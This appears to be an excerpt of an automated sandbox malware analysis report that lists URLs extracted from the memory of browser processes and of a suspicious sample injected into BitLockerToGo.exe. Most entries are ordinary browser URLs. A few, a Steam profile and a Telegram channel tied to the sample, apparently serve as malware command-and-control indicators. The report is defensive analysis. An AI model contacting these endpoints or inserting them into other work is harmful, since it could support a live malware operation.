                  Source: chrome.exe, 00000007.00000003.2003742974.00005AF00196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2003606107.00005AF00195C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/w
                  Source: chrome.exe, 00000007.00000003.2003742974.00005AF00196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2003606107.00005AF00195C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/z
                  Source: chrome.exe, 00000007.00000003.2003742974.00005AF00196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2003606107.00005AF00195C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/~
                  Source: chrome.exe, 00000007.00000003.1967101214.00005AF0002A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2003606107.00005AF00195C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
                  Source: chrome.exe, 00000007.00000003.1998747362.00005AF001818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1999978519.0000244000974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1963750620.000024400071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1963873511.0000244000728000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
                  Source: chrome.exe, 00000007.00000003.2003742974.00005AF00196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2003606107.00005AF00195C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://google-ohttp-relay-join.fastly-edge.com/_
                  Source: chrome.exe, 00000007.00000003.1964472998.0000244000878000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1999535321.00005AF001E28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1999571257.00005AF001E30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2003606107.00005AF00195C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/
                  Source: chrome.exe, 00000007.00000003.1998747362.00005AF001818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/b
                  Source: chrome.exe, 00000007.00000003.1999978519.0000244000974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1963750620.000024400071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1963873511.0000244000728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/bJ
                  Source: msedge.exe, 0000000B.00000002.2168779413.00001FB4003A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                  Source: chrome.exe, 00000007.00000003.1998747362.00005AF001818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs27
                  Source: chrome.exe, 00000007.00000003.1998747362.00005AF001818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs2e
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://i.y.qq.com/n2/m/index.html
                  Source: 2cc80dabc69f58b6_1.12.drString found in binary or memory: https://img-s-msn-com.akamaized.net/
                  Source: 2cc80dabc69f58b6_1.12.drString found in binary or memory: https://img-s.msn.cn/tenant/amp/entityid/
                  Source: BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000CDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
                  Source: msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/161903006
                  Source: msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/166809097
                  Source: msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/184850002
                  Source: msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/187425444
                  Source: msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/220069903
                  Source: msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/229267970
                  Source: msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/250706693
                  Source: msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/253522366
                  Source: msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/255411748
                  Source: msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/258207403
                  Source: msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/274859104
                  Source: msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/284462263
                  Source: msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/issues/166475273
                  Source: chrome.exe, 00000007.00000003.1963873511.0000244000728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2
                  Source: chrome.exe, 00000007.00000003.1999216417.00005AF001D4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard
                  Source: chrome.exe, 00000007.00000003.1999978519.0000244000974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1963750620.000024400071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1963873511.0000244000728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
                  Source: chrome.exe, 00000007.00000003.1999216417.00005AF001D4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardZ
                  Source: chrome.exe, 00000007.00000003.1999978519.0000244000974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1963750620.000024400071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1963873511.0000244000728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
                  Source: chrome.exe, 00000007.00000003.1963873511.0000244000728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiments
                  Source: chrome.exe, 00000007.00000003.1991904976.00005AF0014F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1991641140.00005AF001454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1994699586.00005AF00151C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1994325942.00005AF001454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1991793893.00005AF0014E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1994290879.00005AF001360000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1991848726.00005AF0014E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search?source=ntp
                  Source: chrome.exe, 00000007.00000003.1976923293.00005AF00120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976999250.00005AF00127C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976789017.00005AF00040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976735759.00005AF001278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/upload
                  Source: chrome.exe, 00000007.00000003.1976923293.00005AF00120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976999250.00005AF00127C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976789017.00005AF00040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976735759.00005AF001278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/uploadbyurl
                  Source: chrome.exe, 00000007.00000003.1964525692.0000244000880000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload
                  Source: chrome.exe, 00000007.00000003.1963873511.0000244000728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload2
                  Source: chrome.exe, 00000007.00000003.1998747362.00005AF001818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload2
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://m.kugou.com/
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://m.soundcloud.com/
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://m.vk.com/
                  Source: chrome.exe, 00000007.00000003.1991904976.00005AF0014F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1991641140.00005AF001454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1994699586.00005AF00151C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1994325942.00005AF001454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1991793893.00005AF0014E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1994290879.00005AF001360000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1991848726.00005AF0014E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=rm&amp;ogbl
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://mail.google.com/mail/mu/mp/266/#tl/Inbox
                  Source: msedge.exe, 0000000B.00000002.2168779413.00001FB4003A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.cn/
                  Source: msedge.exe, 0000000B.00000002.2168779413.00001FB4003A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.com/
                  Source: Cookies.14.drString found in binary or memory: https://msn.comXID/
                  Source: Cookies.14.drString found in binary or memory: https://msn.comXIDv10U
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://music.amazon.com
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://music.apple.com
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://music.yandex.com
                  Source: chrome.exe, 00000007.00000003.1998747362.00005AF001818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email2B
                  Source: chrome.exe, 00000007.00000003.1998747362.00005AF001818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email?utm_source=chrome2B
                  Source: chrome.exe, 00000007.00000003.1974824767.00005AF00108C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myactivity.google.com/
                  Source: 2cc80dabc69f58b6_1.12.drString found in binary or memory: https://ntp.msn.cn/edge/ntp
                  Source: 2cc80dabc69f58b6_0.12.dr, 000003.log3.12.drString found in binary or memory: https://ntp.msn.com
                  Source: 000003.log0.12.dr, 000003.log9.12.drString found in binary or memory: https://ntp.msn.com/
                  Source: QuotaManager.12.drString found in binary or memory: https://ntp.msn.com/_default
                  Source: 2cc80dabc69f58b6_1.12.dr, 000003.log9.12.drString found in binary or memory: https://ntp.msn.com/edge/ntp
                  Source: 2cc80dabc69f58b6_1.12.dr, 000003.log9.12.drString found in binary or memory: https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=288
                  Source: QuotaManager.12.drString found in binary or memory: https://ntp.msn.com/ntp.msn.com_default
                  Source: 2cc80dabc69f58b6_0.12.drString found in binary or memory: https://ntp.msn.comService-Worker-Allowed:
                  Source: msedge.exe, 0000000B.00000002.2168779413.00001FB4003A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://office.net/
                  Source: chrome.exe, 00000007.00000003.1994237299.00005AF001470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogads-pa.googleapis.com
                  Source: chrome.exe, 00000007.00000003.1994741284.00005AF000294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com
                  Source: chrome.exe, 00000007.00000003.1994237299.00005AF001470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
                  Source: chrome.exe, 00000007.00000003.1994237299.00005AF001470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/callout?eom=1
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://open.spotify.com
                  Source: chrome.exe, 00000007.00000003.1972569385.00005AF000730000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
                  Source: chrome.exe, 00000007.00000003.1972569385.00005AF000730000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
                  Source: chrome.exe, 00000007.00000003.1972569385.00005AF000730000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
                  Source: chrome.exe, 00000007.00000003.1972569385.00005AF000730000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
                  Source: chrome.exe, 00000007.00000003.1972569385.00005AF000730000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://outlook.live.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://outlook.live.com/mail/0/
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://outlook.live.com/mail/compose?isExtension=true
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://outlook.office.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://outlook.office.com/mail/0/
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://outlook.office.com/mail/compose?isExtension=true
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://outlook.office.com/mail/inbox?isExtension=true&sharedHeader=1&client_flight=outlookedge
                  Source: msedge.exe, 0000000B.00000003.2099970579.00001FB40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2099783318.00001FB400264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/AddSession
                  Source: msedge.exe, 0000000B.00000003.2099970579.00001FB40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2099783318.00001FB400264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/Logout
                  Source: msedge.exe, 0000000B.00000003.2099970579.00001FB40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2099783318.00001FB400264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/LogoutYxABzen
                  Source: msedge.exe, 0000000B.00000003.2099970579.00001FB40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2099783318.00001FB400264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/MergeSession
                  Source: msedge.exe, 0000000B.00000003.2099970579.00001FB40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2099783318.00001FB400264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/OAuthLogin
                  Source: msedge.exe, 0000000B.00000003.2099970579.00001FB40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2099783318.00001FB400264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/RotateBoundCookies
                  Source: msedge.exe, 0000000B.00000003.2099970579.00001FB40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2099783318.00001FB400264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/chrome/blank.html
                  Source: msedge.exe, 0000000B.00000003.2099970579.00001FB40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2099783318.00001FB400264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/o/oauth2/revoke
                  Source: msedge.exe, 0000000B.00000003.2099970579.00001FB40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2099783318.00001FB400264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth/multilogin
                  Source: msedge.exe, 0000000B.00000003.2099970579.00001FB40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2099783318.00001FB400264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v1/userinfo
                  Source: msedge.exe, 0000000B.00000003.2099970579.00001FB40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2099783318.00001FB400264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v2/tokeninfo
                  Source: msedge.exe, 0000000B.00000003.2099970579.00001FB40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2099783318.00001FB400264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v4/token
                  Source: msedge.exe, 0000000B.00000003.2099970579.00001FB40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2099783318.00001FB400264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/reauth/v1beta/users/
                  Source: msedge.exe, 0000000B.00000003.2099970579.00001FB40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2099783318.00001FB400264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/v1/issuetoken
                  Source: chrome.exe, 00000007.00000003.1974824767.00005AF00108C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
                  Source: chrome.exe, 00000007.00000003.1976923293.00005AF00120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976999250.00005AF00127C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976789017.00005AF00040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976735759.00005AF001278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
                  Source: chromecache_477.9.drString found in binary or memory: https://plus.google.com
                  Source: chromecache_477.9.drString found in binary or memory: https://plus.googleapis.com
                  Source: chrome.exe, 00000007.00000003.1974824767.00005AF00108C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://policies.google.com/
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://powerpoint.new?from=EdgeM365Shoreline
                  Source: chrome.exe, 00000007.00000003.1998747362.00005AF001818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
                  Source: chrome.exe, 00000007.00000003.1998747362.00005AF001818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
                  Source: chrome.exe, 00000007.00000003.1998747362.00005AF001818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
                  Source: chrome.exe, 00000007.00000003.1998747362.00005AF001818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
                  Source: chrome.exe, 00000007.00000003.1998747362.00005AF001818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
                  Source: 2cc80dabc69f58b6_1.12.drString found in binary or memory: https://sb.scorecardresearch.com/
                  Source: chrome.exe, 00000007.00000003.1998747362.00005AF001818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.com2
                  Source: chrome.exe, 00000007.00000003.1998747362.00005AF001818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comJv
                  Source: chrome.exe, 00000007.00000003.1998747362.00005AF001818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comb
                  Source: 2cc80dabc69f58b6_1.12.drString found in binary or memory: https://srtb.msn.cn/
                  Source: 2cc80dabc69f58b6_1.12.drString found in binary or memory: https://srtb.msn.com/
                  Source: chrome.exe, 00000007.00000003.1988831473.00005AF000294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
                  Source: chrome.exe, 00000007.00000003.1991904976.00005AF0014F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1991641140.00005AF001454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1994699586.00005AF00151C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1994325942.00005AF001454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1991793893.00005AF0014E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1994290879.00005AF001360000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1991848726.00005AF0014E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
                  Source: N11R7lRasm.exe, 00000000.00000002.1855724656.000000000AB16000.00000004.00001000.00020000.00000000.sdmp, N11R7lRasm.exe, 00000000.00000002.1855724656.000000000AA40000.00000004.00001000.00020000.00000000.sdmp, N11R7lRasm.exe, 00000000.00000003.1850814860.000000000AC3C000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, BitLockerToGo.exe, 00000003.00000002.2650192251.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199825403037
                  Source: BitLockerToGo.exe, 00000003.00000002.2650192251.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199825403037oomaino5Mozilla/5.0
                  Source: BitLockerToGo.exe, 00000003.00000002.2659016940.0000000005C3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                  Source: BitLockerToGo.exe, 00000003.00000002.2659016940.0000000005C3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                  Source: N11R7lRasm.exe, 00000000.00000002.1855724656.000000000AB16000.00000004.00001000.00020000.00000000.sdmp, N11R7lRasm.exe, 00000000.00000002.1855724656.000000000AA40000.00000004.00001000.00020000.00000000.sdmp, N11R7lRasm.exe, 00000000.00000003.1850814860.000000000AC3C000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, BitLockerToGo.exe, 00000003.00000002.2650192251.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/b4cha00
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://tidal.com/
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://twitter.com/
                  Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.12.drString found in binary or memory: https://unitedstates1.ss.wd.microsoft.us/
                  Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.12.drString found in binary or memory: https://unitedstates2.ss.wd.microsoft.us/
                  Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.12.dr | String found in binary or memory: https://unitedstates4.ss.wd.microsoft.us/
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://vibe.naver.com/today
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://web.telegram.org/
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://web.whatsapp.com
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://word.new?from=EdgeM365Shoreline
                  Source: chromecache_477.9.dr | String found in binary or memory: https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1
                  Source: BitLockerToGo.exe, 00000003.00000002.2656831293.0000000005958000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000CDB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://www.deezer.com/
                  Source: BitLockerToGo.exe, 00000003.00000002.2653431701.0000000005528000.00000004.00000020.00020000.00000000.sdmp, zmglfu.3.dr | String found in binary or memory: https://www.ecosia.org/newtab/
                  Source: chrome.exe, 00000007.00000003.1988831473.00005AF000294000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google-analytics.com
                  Source: chrome.exe, 00000007.00000003.1988831473.00005AF000294000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google-analytics.com;report-uri
                  Source: chrome.exe, 00000007.00000003.1988831473.00005AF000294000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com
                  Source: chrome.exe, 00000007.00000003.1974665467.00005AF000D38000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/
                  Source: content.js.12.dr, content_new.js.12.dr | String found in binary or memory: https://www.google.com/chrome
                  Source: chrome.exe, 00000007.00000003.1998747362.00005AF001818000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
                  Source: chrome.exe, 00000007.00000003.1998747362.00005AF001818000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/chrome/hats/index.htmlb
                  Source: BitLockerToGo.exe, 00000003.00000002.2653431701.0000000005528000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2653431701.000000000564E000.00000004.00000020.00020000.00000000.sdmp, zmglfu.3.dr, 3ozmoz.3.dr, Web Data.12.dr | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
